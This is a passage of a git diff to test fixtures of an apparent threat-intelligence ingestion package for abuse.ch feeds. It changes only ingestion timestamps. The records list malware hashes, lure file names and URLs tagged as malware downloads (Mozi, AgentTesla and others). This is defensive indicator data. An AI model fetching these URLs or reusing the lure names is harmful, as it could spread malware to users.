06:04:26\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/\",\"virustotal\":null,\"imphash\":\"ed2860c18f5483e3b5388bad75169dc1\",\"ssdeep\":\"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC\",\"tlsh\":\"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5\"}", "category": "threat", "type": "indicator", @@ -1157,7 +1157,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:03.808337400Z", + "ingested": "2021-12-14T14:56:11.724497640Z", "original": "{\"md5_hash\":\"ff60107d82dcda7e6726d214528758e7\",\"sha256_hash\":\"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:20\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU\",\"tlsh\":\"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json index 4f40d0b8266..d0ce7629fcd 100644 --- a/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/malwarebazaar/_dev/test/pipeline/test-malwarebazaar-ndjson.log-expected.json @@ -56,7 +56,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442181300Z", + "ingested": "2021-12-14T14:56:14.278574446Z", "original": "{\"sha256_hash\":\"5bce7d528c1363104a93fbb5a7fa9bdd991ce929cc09cc7fb29052a68d4fd24b\",\"sha3_384_hash\":\"3b454eb6421d17d093f19292b64d30bf918cb91e9322d0e2d2512857997f574ea2ca5b005133c16f6c33c7cee9c1bd0e\",\"sha1_hash\":\"a71fd0504821092e003f350080a6bcc5fa6a972e\",\"md5_hash\":\"0af07660056a692b7cb82fa329221ddd\",\"first_seen\":\"2021-04-06 20:34:58\",\"last_seen\":null,\"file_name\":\"SALM0BRU.exe\",\"file_size\":399872,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"F9848B24AF932F9BC6CCC1FE50C2D165C9A9F85DD2B1251A73B6CB89FE00544ED2C686\",\"telfhash\":null,\"ssdeep\":\"3072:DsPPK3p+8r5igrL1Tq50cVBDmDJhE9yV4veedHrP6FXK7:D+PL8bronBDmDJ69JeedHriFG\",\"tags\":[\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"15\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -116,7 +116,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442192600Z", + "ingested": "2021-12-14T14:56:14.278576397Z", "original": "{\"sha256_hash\":\"83d0429a2c5f1b611ebc30391eeeb75bebb51212ee1af51dbcf2624b48f9d27f\",\"sha3_384_hash\":\"0a1536add280715320040d5ac5340d3b205d90045ff5c90993b8e909edb9b3e9338b3ffbb3febcaf82584d00d516e8c7\",\"sha1_hash\":\"c454be4eb0892d61a4ad6bac16f97724e73cd795\",\"md5_hash\":\"296aad7075596d21516b30bfbc17fcac\",\"first_seen\":\"2021-04-06 20:32:25\",\"last_seen\":null,\"file_name\":\"PO_NO.ENQUIRY-210604.zip\",\"file_size\":476768,\"file_type_mime\":\"application/zip\",\"file_type\":\"zip\",\"reporter\":\"GovCERT_CH\",\"origin_country\":\"US\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"74A4233B9A6D5CA02B224AA69F37537D13A8406300944EAEFD375CA431583056B9F6FF\",\"telfhash\":null,\"ssdeep\":\"12288:j++y4mulTPaYJSaHwvJblQpLGwYeHU9vPpNGd+Zr:j3HPaMtQxblje01pNHZr\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"11\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442200600Z", + "ingested": "2021-12-14T14:56:14.278576829Z", "original": "{\"sha256_hash\":\"f4910ea08d14eeb634084de47cf590d4dc5e554552f111da20d22ae71d7b425b\",\"sha3_384_hash\":\"ee7586cb085fde3c14c9c1bea4635ccb30b1af2020f64e87a9983e61b05026ec9b35255670a3d9ecaab436c4ba302dcc\",\"sha1_hash\":\"bf103996196df8255881127dee103c22fc12bef3\",\"md5_hash\":\"a4838dd31c672122441bebcbf7e9d277\",\"first_seen\":\"2021-04-06 20:12:29\",\"last_seen\":null,\"file_name\":\"DropDll.dat\",\"file_size\":435926,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":\"Hancitor\",\"imphash\":\"0b5a952a025c2783c3126cdb9bef2844\",\"tlsh\":\"0C947D11BA96C473E572163008399F6A17BE7A900B704BDBE3CC097E4E755C24B36BA7\",\"telfhash\":null,\"ssdeep\":\"12288:L2X/txpFDEVkUNglTovKfoLy+hqK/cEUMMlGOG:RzglgLm/9lGOG\",\"tags\":[\"Hancitor\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -248,7 +248,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442208500Z", + "ingested": "2021-12-14T14:56:14.278577195Z", "original": "{\"sha256_hash\":\"e45ffc61a85c2f5c0cbe9376ff215cad324bf14f925bf52ec0d2949f7d235a00\",\"sha3_384_hash\":\"788f61cf45bbc8cad5775de18d0d5f42c4e028af0aaa34c570645efc96af8ebc3d7fe330aaf22ef34d35360bbd4a708c\",\"sha1_hash\":\"a68ca1b41cb93fe2879bb3baeb8e19990758f099\",\"md5_hash\":\"8d7c8b55ac49d241fb7f75a27a5ef8d5\",\"first_seen\":\"2021-04-06 20:07:59\",\"last_seen\":null,\"file_name\":\"vabsheche.py\",\"file_size\":11717,\"file_type_mime\":\"text/x-script.python\",\"file_type\":\"unknown\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"AE3222515C6A881A03B3C66F7992B844FB588303C7116607F6FC86782F79568CAF1BBD\",\"telfhash\":null,\"ssdeep\":\"192:z7X/yHo/yz/yBKiSOINLyhQMYd+LiTfq6LTf3ZoTta3Grj6rg2:z7CIKnNNLwufPfAPq7\",\"tags\":[\"backdoor\",\"python\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"27\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -311,7 +311,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442216400Z", + "ingested": "2021-12-14T14:56:14.278577553Z", "original": "{\"sha256_hash\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4\",\"sha3_384_hash\":\"752e5d56a166227d06f8cbd40cd3f693f543f9c3f798c673c1430957bb7e149a12d9158138fa449479105f472e70f68f\",\"sha1_hash\":\"e8378aede9f26f09b7d503d79a05d67612be15f6\",\"md5_hash\":\"fe185f106730583156f39233f77f8019\",\"first_seen\":\"2021-04-06 20:00:48\",\"last_seen\":null,\"file_name\":\"42f5f5474431738f91f612d9765b3fc9b85a547274ea64aa034298ad97ad28f4.bin\",\"file_size\":7929856,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"13863341B085EE2EE2CA41BA0DA9C2BD43B63D131E054F677269B72D3EB76E0E7D4144\",\"telfhash\":null,\"ssdeep\":\"196608:KQaeKLOiBEp+uc+iuYmbMdHmN1Rwyd2jecXeaH1pHE+2:oeIOTp+p+iNJC1ChjhXZ1pHz2\",\"tags\":[\"maldoc\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"21\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -378,7 +378,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442224300Z", + "ingested": "2021-12-14T14:56:14.278577927Z", "original": "{\"sha256_hash\":\"2d705f0b76f24a18e08163db2f187140ee9f03e43697a9ea0d840c829692d43c\",\"sha3_384_hash\":\"c82132559381b7b3b184b4ce8c7a58c301a46001621f346b637139f5987dee968ae2ef009a17b2388852b2db15a45b58\",\"sha1_hash\":\"b2da45913353bfc66d189455f9ad80ef26968143\",\"md5_hash\":\"70da6872b6b2da9ddc94d14b02302917\",\"first_seen\":\"2021-04-06 19:58:50\",\"last_seen\":null,\"file_name\":\"winlog.wll\",\"file_size\":131584,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"dll\",\"reporter\":\"ArkbirdDevil\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":null,\"imphash\":\"6476b7c4dd55eafbdf922a7ba1e2d5f9\",\"tlsh\":\"A2D38C067790C071DAAF013908799E624B7F7D70DDB49D8B77841A8E69342D0AF3AB27\",\"telfhash\":null,\"ssdeep\":\"1536:2NVi7z0r0lJRn6I8+YDgr1fnWG5Ff0+adgBYlCtMiQMX1c0E4JsWjcdonPv870E1:YM7zh8+Cofnp5eRm6riQ6OZoPv870E\",\"tags\":[\"apt\",\"tonto\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"30\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -438,7 +438,7 @@ "software": {} }, "event": { - "ingested": "2021-12-13T08:40:06.442232300Z", + "ingested": "2021-12-14T14:56:14.278578281Z", "original": "{\"sha256_hash\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606\",\"sha3_384_hash\":\"a3ec981ed158fe08cc2cd97303807cfbed147e59ccfd92fcaa9395c5718b4d9b892d6e9fa6337f5976dc1bd042562fe4\",\"sha1_hash\":\"3d613d5678e43faeea1c636185a0b4c3ec80e742\",\"md5_hash\":\"de80e1d7d9f5b1c64ec9f8d4f5063989\",\"first_seen\":\"2021-04-06 19:58:44\",\"last_seen\":null,\"file_name\":\"30787f32adc487311d764b19d4504fdeab08c0d385e2fa065bd8d5836c031606.bin.sample\",\"file_size\":1088000,\"file_type_mime\":\"application/msword\",\"file_type\":\"docx\",\"reporter\":\"DmitriyMelikov\",\"origin_country\":\"DE\",\"anonymous\":0,\"signature\":null,\"imphash\":null,\"tlsh\":\"8635D001BA82C573D5621A35083ADBAA177E7D604F704ADBB3C83B2E5D355C14B32BA7\",\"telfhash\":null,\"ssdeep\":\"24576:WKEiZxl3A4yJJG2dPQQCthXzglgLm/9lGO:WKEGByvGOQQC/XElga/9lGO\",\"tags\":null,\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"32\",\"uploads\":\"1\",\"mail\":null}}", "category": "threat", "type": "indicator", @@ -510,7 +510,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442240100Z", + "ingested": "2021-12-14T14:56:14.278578631Z", "original": "{\"sha256_hash\":\"84f983067868de50e5b1553782c056c1f5b5118bb2084473ca4b6908f221cd3b\",\"sha3_384_hash\":\"138dc28a74d15c1f9797ce732e99097c8c6db4549cb17cb7b20c1c6738a170328e45aea2d4c3b593912f14a97f521c1d\",\"sha1_hash\":\"00b52e8ca1785d5086703ad8cff1d28fc3354934\",\"md5_hash\":\"2759c73c986c6a757bf9d25621c5595a\",\"first_seen\":\"2021-04-06 19:52:32\",\"last_seen\":null,\"file_name\":\"Purchase Order.8000.scan.pdf...exe\",\"file_size\":752128,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"SnakeKeylogger\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"23F4AE212684C9C0D93E67B4D43584F003BABD16D631F69F6E887C693EB32D2D63B646\",\"telfhash\":null,\"ssdeep\":\"12288:8t11ulRZRLZNh4YeX6f6XmwNShqE73YXy7moh:S11gZpZNmBX06WmAcy7m0\",\"tags\":[\"exe\",\"SnakeKeylogger\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"38\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", @@ -582,7 +582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:06.442248100Z", + "ingested": "2021-12-14T14:56:14.278579005Z", "original": "{\"sha256_hash\":\"0661d87116f44cbd5b5c6bec7fb06c4e5cd5b6ecbc5455d959e65f1ee46c54c8\",\"sha3_384_hash\":\"ed5d03454121d81adf65a01ba90af81b1a7cea052709c22bb9170508069d17242861f85e5546b2cc3efb07c10926368c\",\"sha1_hash\":\"a34fd5e57d75d17bc2d84055ca4752e5ee2e92f5\",\"md5_hash\":\"596b3dbf07a287dcf76860b5e54762c3\",\"first_seen\":\"2021-04-06 19:47:13\",\"last_seen\":null,\"file_name\":\"New Order PO#121012020_____PDF_______.exe\",\"file_size\":836096,\"file_type_mime\":\"application/x-dosexec\",\"file_type\":\"exe\",\"reporter\":\"James_inthe_box\",\"origin_country\":\"FR\",\"anonymous\":0,\"signature\":\"AgentTesla\",\"imphash\":\"f34d5f2d4577ed6d9ceec516c1f5a744\",\"tlsh\":\"A505CF712694C9A4FABD53B80434403007F5FE42E232FA9A6FD17C993E72782DA3B655\",\"telfhash\":null,\"ssdeep\":\"12288:qRedcNeqimzAEmN03VgdZfBOMx+RVBM7pdWje9ppB5nAZGNY2:ZaNeqikqN0udZfBFUYp55nFN\",\"tags\":[\"AgentTesla\",\"exe\"],\"code_sign\":[],\"intelligence\":{\"clamav\":null,\"downloads\":\"40\",\"uploads\":\"1\",\"mail\":{\"Generic\":\"low\"}}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json index 1afae375bb2..3c98bc9320f 100644 --- a/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json +++ b/packages/ti_abusech/data_stream/url/_dev/test/pipeline/test-abusechurl-ndjson.log-expected.json @@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024388900Z", + "ingested": "2021-12-14T14:56:15.726381621Z", "original": "{\"id\":\"961548\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961548/\",\"url\":\"http://89.160.20.156:34613/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -88,7 +88,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024427700Z", + "ingested": "2021-12-14T14:56:15.726384263Z", "original": "{\"id\":\"961546\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961546/\",\"url\":\"http://89.160.20.156:44941/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -137,7 +137,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024435500Z", + "ingested": "2021-12-14T14:56:15.726384695Z", "original": "{\"id\":\"961547\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961547/\",\"url\":\"http://89.160.20.156:37173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -186,7 +186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024442600Z", + "ingested": "2021-12-14T14:56:15.726385185Z", "original": "{\"id\":\"961545\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961545/\",\"url\":\"http://89.160.20.156:47545/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -235,7 +235,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024449900Z", + "ingested": "2021-12-14T14:56:15.726385558Z", "original": "{\"id\":\"961544\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961544/\",\"url\":\"http://89.160.20.156:44782/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -284,7 +284,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024457300Z", + "ingested": "2021-12-14T14:56:15.726385940Z", "original": "{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://89.160.20.156:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -333,7 +333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024464600Z", + "ingested": "2021-12-14T14:56:15.726386301Z", "original": "{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://89.160.20.156:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -382,7 +382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024471800Z", + "ingested": "2021-12-14T14:56:15.726386657Z", "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://89.160.20.156:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -431,7 +431,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024479Z", + "ingested": "2021-12-14T14:56:15.726387116Z", "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://89.160.20.156:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -480,7 +480,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024486700Z", + "ingested": "2021-12-14T14:56:15.726387476Z", "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://89.160.20.156:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -529,7 +529,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024493900Z", + "ingested": "2021-12-14T14:56:15.726387833Z", "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://89.160.20.156:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -578,7 +578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024501300Z", + "ingested": "2021-12-14T14:56:15.726388335Z", "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://89.160.20.156:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -627,7 +627,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024508500Z", + "ingested": "2021-12-14T14:56:15.726388859Z", "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://89.160.20.156:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -676,7 +676,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024516100Z", + "ingested": "2021-12-14T14:56:15.726389271Z", "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://89.160.20.156:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -725,7 +725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024523500Z", + "ingested": "2021-12-14T14:56:15.726389631Z", "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://89.160.20.156:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -774,7 +774,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024548900Z", + "ingested": "2021-12-14T14:56:15.726389997Z", "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://89.160.20.156:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -823,7 +823,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024556600Z", + "ingested": "2021-12-14T14:56:15.726390451Z", "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://89.160.20.156:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -872,7 +872,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024563700Z", + "ingested": "2021-12-14T14:56:15.726390864Z", "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://89.160.20.156:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -921,7 +921,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024570900Z", + "ingested": "2021-12-14T14:56:15.726391230Z", "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://89.160.20.156:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -970,7 +970,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024577900Z", + "ingested": "2021-12-14T14:56:15.726391589Z", "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://89.160.20.156:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024585Z", + "ingested": "2021-12-14T14:56:15.726391985Z", "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://89.160.20.156:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1068,7 +1068,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024592100Z", + "ingested": "2021-12-14T14:56:15.726392472Z", "original": 